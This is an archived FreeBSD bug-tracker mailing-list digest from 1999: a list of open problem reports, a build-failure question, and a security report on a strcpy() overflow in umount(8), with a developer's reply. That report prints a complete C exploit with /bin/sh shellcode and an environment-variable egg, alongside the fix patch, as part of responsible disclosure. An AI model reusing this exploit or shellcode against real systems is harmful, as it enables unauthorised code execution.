bin/13092 des Fetch doesn't default to the correct http o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] docs/13116 doc typo in ms(7) o [1999/08/13] misc/13117 CVS repo src/lib/libc_r/uthread incorrect o [1999/08/13] ports/13124ports New port, LinAlg; request for local hosti o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/13] ports/13129torstenb Postfix Port Ignores MANPREFIX o [1999/08/13] ports/13133chuckr update: xpdf 0.90 o [1999/08/14] ports/13136ports new port: guiTAR 0.1.4 o [1999/08/14] bin/13143 billf changing mount flags on a mounted filesys o [1999/08/14] ports/13149ports New port : math/topaz o [1999/08/15] misc/13152 systemwide username too short (currently o [1999/08/15] docs/13153 doc fdc.4 has typo (a line which begin with ' o [1999/08/15] ports/13159ports New port: java/collections o [1999/08/15] ports/13160ports New port: java/jaf o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] ports/13162ports New port: java/infobus o [1999/08/15] ports/13163ports New port: java/javamail o [1999/08/15] kern/13164 kthread_exit stops, but doesn't release p o [1999/08/15] ports/13167ports [PATCH] security/ssh package keygen fails o [1999/08/15] i386/13171 "config" not quite right for kernel not n o [1999/08/16] ports/13173andy New port: yiff-0.33 o [1999/08/16] kern/13176 cannot set _default_ colours for console o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/17] ports/13191andy New port: fire-1.0 o [1999/08/17] docs/13197 mpp aio_*(2) not installing by make installwo o [1999/08/17] ports/13201ports new port: xmess (X11 emulator for game co o [1999/08/17] kern/13209 IPFILTER_DEFAULT_BLOCK not in /usr/src/sy o [1999/08/17] docs/13211 chris [LIST] Some man pages has references to n o [1999/08/17] kern/13215 ALPS GlidePoint in Sony Z505 not recogniz o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] docs/13225 doc fpa.4 seems to be i386 specific and shoul o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/18] bin/13235 mpp allow preprocessing with tbl(1) for nroff o [1999/08/18] bin/13236 billf Patch for whois to use UK Nominet databas o [1999/08/18] conf/13249 sysinstall not installing from a local ft o [1999/08/18] ports/13251andy New port: founts-11 s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] ports/13267andy New port: glasteroids-1.0 o [1999/08/20] misc/13275 inter.phone has old codes for Guatemala o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/20] kern/13281 wollman Support for VLANs missing? o [1999/08/20] misc/13282 partial compliance of dlopen to the Singl o [1999/08/21] ports/13291andy New port: xap-xwf-0.7.8 o [1999/08/21] ports/13297ports [NEW PORT] PyOpenGL - An OpenGL interface o [1999/08/21] bin/13309 Fixes to nos-tun o [1999/08/21] ports/13312ports new port dhid s [1999/08/21] kern/13314 sheldonh can't compile when softupdates + debug. o [1999/08/22] ports/13320ports New port: cfingerd o [1999/08/22] ports/13324ports New port: zope-2.0.0b5 o [1999/08/22] misc/13326 additional timeval interfaces for 4.0. o [1999/09/06] ports/13606ache Apache's suEXEC wrapper doesn't enforce u o [1999/09/07] conf/13609 Some deamons not replacable at boot time o [1999/09/07] ports/13614ports xdm and wdm do not set environment variab o [1999/09/07] ports/13619ports www/p5-libwww incorrect dependency orderi o [1999/09/07] ports/13633ports Better location for samba's private direc o [1999/09/08] bin/13649 billf Enhancement to PKG_INSTALL tools (4.0-CUR o [1999/09/08] ports/13650asami Port Conflict Checking for bsd.port.mk o [1999/09/09] docs/13657 doc mklocale(1) man errors o [1999/09/09] kern/13666 buggy filesystems are built as modules o [1999/09/09] ports/13677ports Misc. Ports fix ups. o [1999/09/10] ports/13684ports Just a port submission o [1999/09/10] bin/13692 umount(8) does not unmount filesystems wi o [1999/09/11] ports/13694ports Y2K patch for slurp port o [1999/09/11] bin/13697 pstat(8) command line option '-w' not fun o [1999/09/11] misc/13698 Here is: a euro character for syscons & i o [1999/09/11] ports/13700ports security/stunnel patch so configure can l o [1999/09/11] ports/13701ports The qtarch-site has moved o [1999/09/11] ports/13704ports net/gnome-icu/patches/patch-ae broken zh_ o [1999/09/11] ports/13705ports p5-Apache port is outdated and too comple o [1999/09/12] i386/13706 FreeBSD identifies all 80486 processors a o [1999/09/12] ports/13713jseger upgrade gnugo port to 2.4 o [1999/09/13] ports/13716ports tac_plus.F4.0.2 port for FreeBSD o [1999/09/13] ports/13723ports upgrade russian/apache port to 1.3.9 o [1999/09/13] kern/13725 sheldonh Comment in LINT: extracting config file f o [1999/09/13] ports/13727ports new port: www/netscape-remote o [1999/09/13] ports/13734billf ifhp-3.3.9 port o [1999/09/13] ports/13743ports New Port: net/priss o [1999/09/14] ports/13745ports [NEW PORT] wamcc - prolog-to-c compiler o [1999/09/14] ports/13753ports Nonexisting file in PLIST o [1999/09/14] ports/13754ports ports:devel/yacl - fix for new gcc/egcs o [1999/09/15] ports/13756ports New port: mail/minimalist o [1999/09/15] bin/13758 [PATCH] adding current download throughpu o [1999/09/15] bin/13759 Makefile for sendmail configurations o [1999/09/15] ports/13760ports new port: www/udmsearch o [1999/09/15] ports/13761ports Just an upgrade to the X-Files port o [1999/09/15] ports/13762ports Additional patches for editors/elvis o [1999/09/15] docs/13763 doc ambiguity in vidcontrol(1) manpage o [1999/09/15] kern/13764 yokota [PATCH] Stop syscons from flushing histor o [1999/09/15] docs/13767 doc rstat_svc(8) manpage present, but /etc/rs o [1999/09/15] conf/13769 NATD is not compatible with the "simple" o [1999/09/15] kern/13770 phk Almost clone update for kernel ppp implem o [1999/09/16] bin/13781 [PATCH] allow tcpdump to print packet con o [1999/09/16] ports/13784ports xfig docs not in a share hierarchy o [1999/09/17] ports/13786ports New port for GHC-4.04 o [1999/09/17] ports/13788ports aclgen port o [1999/09/17] ports/13789ports update to www/fcgi-devkit port to include o [1999/09/17] docs/13792 doc Difficult to find documentation of "secur o [1999/09/17] bin/13799 [patch] teach vidcontrol there are up to o [1999/09/17] ports/13800se Patches attached for kdelibs-1.1.1, fix ' o [1999/09/18] misc/13807 data-sensitivity buglet in 'make release' o [1999/09/18] ports/13808ports linux-rvplayer port improved a'la netscap o [1999/09/18] ports/13809ports new port: sysutils/wmbattery o [1999/09/19] docs/13813 doc Commercial Vendors: NetWolves Corporation o [1999/09/19] docs/13815 doc Out-of-date FAQ entries o [1999/09/19] ports/13823ports stat port not formatting device node o [1999/09/19] ports/13826ports gpasman update 1.1.3 -> 1.3.0 o [1999/09/19] ports/13827obrien Update port: lang/mawk o [1999/09/19] ports/13832se kdebase11 doesn't DTRT when PREFIX is set o [1999/09/19] ports/13833se make PREFIX=/foo/bar/quux broken for kdeu o [1999/09/19] ports/13834se make PREFIX= broken in kdesupport11 o [1999/09/19] ports/13835se Fix 'make PREFIX=...' for kdegames11 o [1999/09/19] ports/13840se 'make PREFIX' fails for kdenetwork11 s [1999/09/19] kern/13841 hm ISDN i4b does not hang up o [1999/09/19] ports/13842se 'make PREFIX' fails for kdemultimedia s [1999/09/19] kern/13843 ken da driver does not support 'CDIOCEJECT' i o [1999/09/19] kern/13846 [PATCH] remove some kernel compile warnin o [1999/09/20] kern/13850 detect more VGA cards o [1999/09/20] ports/13856ports New ports: fujiplay-1.33(graphics/fujipla o [1999/09/20] ports/13861ports New port submission - ddup-2.0.4 o [1999/09/20] conf/13863 obrien dhclient-script doesn't update route if n o [1999/09/20] misc/13867 Cannot install source of X11 s [1999/09/21] bin/13869 sheldonh man program saves multiple cached copies o [1999/09/21] bin/13870 "ps tpt" produces "ps: /dev/ttypT: No suc o [1999/09/21] ports/13874ports ports update to openldap-1.2.7 o [1999/09/21] docs/13878 doc No isnanf(3) documentation o [1999/09/21] bin/13882 mount -p is missing the quota options o [1999/09/21] kern/13883 Can't have a MFS filesystem > 512MB o [1999/09/21] ports/13887taoka New port (fmirror) o [1999/09/22] docs/13891 doc Submission for commerical vendor page o [1999/09/22] misc/13895 nonexistent words in /usr/share/dict/web2 o [1999/09/22] ports/13896ports new port: misc/dictd-client o [1999/09/22] ports/13898ports new port: misc/dictd o [1999/09/22] ports/13899ports port submission: xmsg-1.0 o [1999/09/22] bin/13901 strptime breaks when handling some numeri o [1999/09/22] ports/13906ports port submission: biffer-1.0 o [1999/09/22] conf/13907 dummynet.4 correction, rc addition of s [1999/09/22] bin/13909 sheldonh /etc/security problems: IPFIREWALL and pa o [1999/09/22] docs/13914 doc global(1) manpage does not explain -v opt o [1999/09/23] conf/13916 mpp man outputs footer only page as first pag o [1999/09/23] conf/13918 Termcap entries for VESA modes missing o [1999/09/23] gnu/13921 awk -v var=val coredump o [1999/09/23] kern/13924 sb/snd driver broken under 4.0-19990918-C o [1999/09/23] ports/13925ports Brand new port for xcut-0.2. o [1999/09/23] ports/13927billf textproc/htdig updated o [1999/09/24] gnu/13935 FreeBSD uses an obsolete version of grep o [1999/09/24] i386/13936 No clear indictaion of how much space to o [1999/09/25] docs/13946 doc Various updates to handbook/kernelconfig/ o [1999/09/25] docs/13949 jim Various fixes to faq/book.sgml o [1999/09/25] docs/13950 doc webpage idea o [1999/09/25] ports/13952ports update emulators/wine to 990923 (supersed o [1999/09/25] docs/13953 doc BRU Product Update o [1999/09/25] docs/13954 doc Listing on Consulting Page: Collective Te o [1999/09/25] docs/13956 doc commercial vendor: JAV-Associates Consult o [1999/09/25] docs/13957 doc Correction to your website for ZNYX Corp. o [1999/09/25] docs/13958 doc consultant page submission: Atlas Softwar o [1999/09/25] docs/13959 doc cgi notes o [1999/09/25] docs/13960 doc Consulting group in Melbourne, Australia o [1999/09/25] docs/13961 doc Commercial Vendors - Consulting: Peter Br o [1999/09/25] docs/13962 doc Commercial Vendors - Consulting: Internet o [1999/09/25] docs/13963 doc Request for listing in Consultants Page: o [1999/09/25] docs/13964 doc Vendor: Vancouver Internetworking o [1999/09/25] docs/13966 doc Commercial Vendor list: Parabase Technolo o [1999/09/25] docs/13967 doc FreeBSD Related Publications in Korea o [1999/09/25] docs/13969 doc Commercial Vendors - Hardware: ActiveWire o [1999/09/25] docs/13970 doc FreeBSD Newbie Newsletter o [1999/09/26] kern/13979 [PATCH] add serial number to IDE HD probe o [1999/09/26] docs/13984 doc additional entry in hardware section o [1999/09/26] ports/13986ports new port: sysutils/gnometoaster o [1999/09/26] gnu/13989 SIGWINCH corrupts the display of a multil o [1999/09/27] ports/14001scrappy [PATCH] New version 2.3.0 of the mico por o [1999/09/27] kern/14006 pas2_pcm.c pcm playback problem, with fix o [1999/09/28] gnu/14011 ru grep(1) returned unpredictable output for o [1999/09/28] ports/14012ports port submission: iconv o [1999/09/28] ports/14016ports Update ports: japanese/dbskkd-cdb o [1999/09/28] docs/14024 doc Several manpages still mentions hosts.den o [1999/09/28] ports/14032ports new port of gpart o [1999/09/29] docs/14035 doc tzfile.h referenced in tzfile(5) doesn't o [1999/09/29] ports/14036ports Update: korean/baekmuk-bdf o [1999/09/29] ports/14037ports Ports Update: korean/ami o [1999/09/29] bin/14040 amd has wrong uname data compile in it o [1999/09/30] ports/14047ports /usr/ports/x11-clocks/emiclock replacemen o [1999/09/30] i386/14048 ``doscmd -r'' doesn't work o [1999/09/30] ports/14052ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14055ports New Port: newmail o [1999/09/30] docs/14067 doc Vendor: Aeon/Xe Technology Pte Ltd o [1999/09/30] ports/14070ports g2c libraries and compatibility for DJGPP o [1999/09/30] i386/14071 FreeBSD 3.3 Installation CD does not boot o [1999/10/01] docs/14074 grog vinum(8) manpage gets warning 4.7 o [1999/10/04] docs/14112 doc calls in ddb doc don't exist any longer o [1999/10/04] ports/14124ports Update port: graphics/tiff to 3.5.2 o [1999/10/04] docs/14129 phantom gated(8) and htable(8) as referenced in r o [1999/10/04] kern/14136 no mean 'OVERRIDE_xxx' o [1999/10/04] ports/14137ports [NEW PORT] security/p5-Authen-PAM o [1999/10/04] kern/14138 sos writing to ZIP 250MB drive bombs via ATAP o [1999/10/05] bin/14142 sendmail: mci.c: bad pointer conversion i o [1999/10/05] i386/14146 dillon NFS mount bug which prevents mounting of o [1999/10/05] bin/14151 Patch: date(1): merge in OpenBSD enhancem o [1999/10/06] docs/14158 doc md5(1) manpage should not claim the md5 a o [1999/10/06] docs/14159 doc Commercial Vendors - Software: Deskware, o [1999/10/06] ports/14160ports New port: japanese/makejvf o [1999/10/06] ports/14161ports New port: japanese/vfxdvik o [1999/10/06] ports/14164ports distfiles for archivers/unzip.with_encryp o [1999/10/06] docs/14165 doc FDP introduction article o [1999/10/06] kern/14166 AVER TVPhone o [1999/10/06] bin/14169 ru natd only handles limited number of inter o [1999/10/06] bin/14171 [PATCH] create symbolic links using mtree o [1999/10/06] ports/14172ports New port: net/elsa o [1999/10/07] bin/14175 route for ip aliasing o [1999/10/07] ports/14176imp seahaven(6) obtains SIGFPE o [1999/10/07] docs/14181 doc patch to bind(2) to include EAGAIN o [1999/10/07] ports/14182asami Patch: bsd.port.mk: add plist target o [1999/10/07] ports/14185ports ports/x11-wm/fvwm2 updated from 2.2.2 to o [1999/10/07] ports/14188ports kdm bug and workaround o [1999/10/07] ports/14196sada Update port: graphics/gimp1-i18n o [1999/10/07] alpha/14200alpha kldstat command has formatting problems o o [1999/10/08] ports/14209ports Update port: graphics/giflib to libungif- o [1999/10/08] kern/14217 [PATCH] EXT2FS as a KLD o [1999/10/08] ports/14218ports make sysutils/pkg_version use nik's patch o [1999/10/08] ports/14222ports close to impossible to fetch xpdf decrypt o [1999/10/08] ports/14224ports ports/x11-clocks/emiclock, move MASTER_SI o [1999/10/09] ports/14225markm Patches for security/pgp5 o [1999/10/09] ports/14231ache MD5 checksum error installing lynx-curren o [1999/10/09] ports/14235gpalmer Update x11-clocks/xdaliclock to 2.14 o [1999/10/09] bin/14239 [PATCH] Trivial fortune spelling correcti o [1999/10/09] kern/14240 compilation error: __cmpdi2 unresolved o [1999/10/09] bin/14246 kvm_open and kvm_openfiles not works corr o [1999/10/10] docs/14248 doc codify proposed style o [1999/10/10] misc/14253 Mistake in dhclient-script(8) man page o [1999/10/10] bin/14255 rup and rusers could not deal with many h o [1999/10/11] misc/14258 IP_TOS and IP_TTL sockopt doesn't work on o [1999/10/11] ports/14260ports WODA - A Web Oriented Database System o [1999/10/11] ports/14262ports devel/boehm-gc ignores CFLAGS o [1999/10/11] misc/14263 phantom There ara no ukrainian locale in stable/c o [1999/10/11] i386/14266 vfsload() looks in /lkm, not /modules o [1999/10/11] misc/14269 NIS passwd and group maps do not clean ou o [1999/10/11] ports/14271ports Yorick builds without X support o [1999/10/11] ports/14272ports bringing mozilla port up to M10 o [1999/10/11] misc/14273 Somewhat bogus entry in termcap o [1999/10/11] ports/14276ports new port-tkdiff-3.04 o [1999/10/11] kern/14278 'newpcm' does'nt compile with '-fno-built o [1999/10/12] ports/14280kris port curl build flag USE_SSL does nothing o [1999/10/12] misc/14284 jdp libradius accounting patch o [1999/10/12] ports/14286ports Clean up print/pkfonts* and japanese/vfxd o [1999/10/12] ports/14288ports Kill palm/prc-tools o [1999/10/12] ports/14294ports gimp1 upgrade: 1.1.5 --> 1.1.10 o [1999/10/12] conf/14297 [Patch] pccard.conf for corega Ether PCC- o [1999/10/12] docs/14299 doc ruptime(1) manpage doesn't say hosts down o [1999/10/13] misc/14300 MAKEDEV requires /usr to be mounted (for o [1999/10/13] bin/14305 ru natd should know FTP EPRT command o [1999/10/13] ports/14309ports Update graphics/gd to 1.7.5 o [1999/10/13] ports/14311ports new port: www/gnuinfo o [1999/10/13] ports/14312ports New port: wmmatrix-0.2 o [1999/10/13] ports/14313jim Update port pine 4.10 -> 4.20 o [1999/10/13] ports/14316markm exmh not recognizing mh and uses too many o [1999/10/13] bin/14317 jkh sysintall: instructions to reboot don't m o [1999/10/13] bin/14318 jkh sysinstall upon install has some counter- o [1999/10/13] docs/14319 doc hostname(1) doesn't mention rc.conf o [1999/10/14] docs/14320 doc tzfile manual page has omissions and erro o [1999/10/14] docs/14321 doc Missing ld.so.1. o [1999/10/14] ports/14323markm [PATCH] ports/security/pgp5: Invoked with o [1999/10/14] ports/14329me UPDATE: xemacs21 -> 21.1.7 o [1999/10/14] bin/14330 peter [PATCH] fix clash between /usr/src/contri o [1999/10/14] bin/14335 peter Manual page for ndc gives incorrect path o [1999/10/14] ports/14337ports xdm and Eterm: tty allocation problem? o [1999/10/14] bin/14342 [PATCH] Speed ups for regex! o [1999/10/15] kern/14346 Both pccard/cardinfo.h and sys/memrange.h o [1999/10/15] kern/14350 Security enhancement to ICMP o [1999/10/15] ports/14351ports cocoon port update to 1.4 from 1.3.1 o [1999/10/15] ports/14353ports cvslines port has bad path to perl and rc o [1999/10/15] kern/14355 perhaps a guard page needed for UP-mode k o [1999/10/15] kern/14356 grog vinum and ``some processes would not die; o [1999/10/15] ports/14358ports new port -- fb a binary file viewer and e o [1999/10/15] ports/14359ports Update port: mail/imap-uw o [1999/10/16] ports/14360ports xmms core dumps when trying to play strea o [1999/10/16] bin/14361 locate bogusly converts to network byte o o [1999/10/16] ports/14362ports Update port: sysutils/wmhm o [1999/10/16] ports/14363ports o [1999/10/16] ports/14364ports the master site for port ucspi-tcp has mo o [1999/10/16] ports/14365ports update port: misc/bidwatcher; from 0.9.11 o [1999/10/17] ports/14366ports wdm doesn't call setlogin() properly--act o [1999/10/17] ports/14367ports Update port: sysutils/consolehm o [1999/10/17] bin/14368 marcel Update compat3x distribution o [1999/10/17] ports/14370ports Update port: ftp/lftp o [1999/10/17] ports/14375ports update port: misc/bidwatcher; from 0.9.11 o [1999/10/17] ports/14376ports [PATCH] shells/zsh-devel - fix zshall(1) o [1999/10/17] ports/14377ports [PATCH] shells/zsh - fix zshall(1) o [1999/10/17] ports/14378ports New Port: graphics/mpeg o [1999/10/17] ports/14379ports New Port: graphics/xmrm o [1999/10/17] kern/14380 [PATCH] if_de workaround for when BIOS do o [1999/10/17] ports/14381ports New port: games/x3eyes o [1999/10/17] ports/14382ports New port for tkrat version 2.0b3 o [1999/10/17] i386/14383 pthread_kill() does not call sighandler o o [1999/10/17] ports/14384ports update olirc to 0.0.37 o [1999/10/17] ports/14385ports Update port: sysutils/wmhm o [1999/10/17] ports/14389ports XScreensaver port does not properly detec o [1999/10/18] ports/14391foxfair Upgrade chinese/xcin25 to the latest rele o [1999/10/18] ports/14392foxfair chinese/moettf has a bug when writing fon o [1999/10/18] ports/14393foxfair Free-distributable Chinese Big5/GB TTFs o [1999/10/18] kern/14394 kernel panic when asking help in visual u o [1999/10/18] ports/14395ports change of email address for games/connect o [1999/10/18] i386/14396 Floppy install of 3.2-release, 3.3-releas o [1999/10/18] ports/14399ports update port: net/iplog o [1999/10/18] docs/14401 doc ch0 device not documented in /dev/MAKEDEV o [1999/10/18] ports/14402ports Update port: devel/gide to 0.1.5 o [1999/10/18] ports/14403ports Update port: graphics/netpbm to 8.0 o [1999/10/18] ports/14404ports Update port: japanese/k12 to 1.1 o [1999/10/18] ports/14405ports Update port: lang/cim 1308 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 11:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EFFAF1515F for ; Mon, 18 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA95884; Mon, 18 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 911BD14BD4 for ; Mon, 18 Oct 1999 11:45:53 -0700 (PDT) (envelope-from venglin@lubi.FreeBSD.lublin.pl) Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:7173 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Mon, 18 Oct 1999 20:45:23 +0200 Received: (qmail 5416 invoked by uid 66); 18 Oct 1999 18:45:23 -0000 Received: (qmail 19841 invoked by uid 1001); 18 Oct 1999 14:41:09 -0000 Message-Id: <19991018144109.19840.qmail@lubi.FreeBSD.lublin.pl> Date: 18 Oct 1999 14:41:09 -0000 From: venglin@lubi.FreeBSD.lublin.pl Reply-To: venglin@lubi.FreeBSD.lublin.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14406: [SECURITY] strcpy() buffer overflow in umount(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14406 >Category: bin >Synopsis: [SECURITY] strcpy() buffer overflow in umount(8) >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 18 11:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 3.2-STABLE i386 >Organization: Lublin BSD Users Group >Environment: All versions. >Description: It's possible to execute arbitrary code by overflowing buffer in umount(8). By default umount(8) is NOT installed with setuid or setgid bits set. >How-To-Repeat: /* * * (c) 1999 babcia padlina ltd. * FreeBSD /sbin/umount exploit. * */ #include #include #include #include #define NOP 0x90 #define OFS 1800 #define BUFSIZE 1024 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc > 2) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); if(!(buf = (char *)malloc(ADDRS+1))) { perror("malloc()"); return -1; } p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); chmod(".", 0); // fuck da realpath()! execl("/sbin/umount", "umount", buf, 0); return 0; } >Fix: *** sbin/umount/umount.c.orig Mon Aug 3 08:44:46 1998 --- sbin/umount/umount.c Mon Oct 18 16:36:49 1999 *************** *** 215,221 **** if (realpath(name, rname) == NULL) { /* Continue and let the system call check it... */ ! strcpy(rname, name); } origname = name; --- 215,222 ---- if (realpath(name, rname) == NULL) { /* Continue and let the system call check it... */ ! strncpy(rname, name, MAXPATHLEN-1); ! rname[MAXPATHLEN] = '\0'; } origname = name; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 20:17:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 2E83B15A5F for ; Mon, 18 Oct 1999 20:17:15 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: (from shelton@localhost) by sentry.granch.ru (8.9.3/8.9.3) id KAA14915 for freebsd-bugs@freebsd.org; Tue, 19 Oct 1999 10:16:53 +0700 (NOVST) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Tue, 19 Oct 1999 10:16:53 +0700 (NOVST) Organization: Granch Ltd. From: "Rashid N. Achilov" To: freebsd-bugs@freebsd.org Subject: meke depend failed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FreeBSD 3.3-STABLE. Today cvsupped updates for kernel, and, when tried to make depend, it's failed. rm -f .newdep mkdep -a -f .newdep -O -Wreturn-type -Wcomment -Wredundant-decls -Wimplicit -Wnested-externs -Wstrict-prototypes -Wmissing-pro totypes -Wpointer-arith -Winline -Wuninitialized -Wformat -Wunused -fformat-extensions -ansi -nostdinc -I- -I. -I../.. -I/us r/include -DKERNEL -DVM_STACK -include opt_global.h -elf device_if.c bus_if.c [...rest of commandline skipped...] ../../netinet/tcp_input.c:39: opt_tcp_input.h: No such file or directory mkdep: compile failed *** Error code 1 Stop. What can I do? --- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Cert. ID: 28514, Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 21:50: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A97615D6F for ; Mon, 18 Oct 1999 21:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA47171; Mon, 18 Oct 1999 21:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Mon, 18 Oct 1999 21:50:03 -0700 (PDT) Message-Id: <199910190450.VAA47171@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: bin/14406: [SECURITY] strcpy() buffer overflow in umount(8) Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/14406; it has been noted by GNATS. From: Martin Blapp To: freebsd-gnats-submit@freebsd.org, venglin@lubi.FreeBSD.lublin.pl Cc: Subject: Re: bin/14406: [SECURITY] strcpy() buffer overflow in umount(8) Date: Tue, 19 Oct 1999 04:40:05 +0000 Hi, This is fixed in current since 2 day's. CVSup to the newest sources and try again. And you should not run umount(8) +s anyway :) But we should fix it in releng_3 (and 2.2.8). Thank you very much for your bugreport. Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 19 0: 0: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 16A2E16013 for ; Tue, 19 Oct 1999 00:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA63063; Tue, 19 Oct 1999 00:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 11A4F15FC2; Mon, 18 Oct 1999 23:52:40 -0700 (PDT) Message-Id: <19991019065240.11A4F15FC2@hub.freebsd.org> Date: Mon, 18 Oct 1999 23:52:40 -0700 (PDT) From: Precious_26@nightmail.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14412: well i have e-mail at nightmail its not letting me deleat anything and gave me root to call what can i do e-mail at esquibel@yep.com ok Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14412 >Category: misc >Synopsis: well i have e-mail at nightmail its not letting me deleat anything and gave me root to call what can i do e-mail at esquibel@yep.com ok >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 19 00:00:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: melissa >Release: nightmail >Organization: >Environment: >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 19 1:24:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7933215FEB; Tue, 19 Oct 1999 01:24:58 -0700 (PDT) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA70099; Tue, 19 Oct 1999 01:24:58 -0700 (PDT) (envelope-from billf@FreeBSD.org) Date: Tue, 19 Oct 1999 01:24:58 -0700 (PDT) From: Message-Id: <199910190824.BAA70099@freefall.freebsd.org> To: Precious_26@nightmail.com, billf@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/14412: well i have e-mail at nightmail its not letting me deleat anything and gave me root to call what can i do e-mail at esquibel@yep.com ok Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: well i have e-mail at nightmail its not letting me deleat anything and gave me root to call what can i do e-mail at esquibel@yep.com ok State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Tue Oct 19 01:24:44 PDT 1999 State-Changed-Why: Empty PR, thanks for nothing. To Unsubscribe: 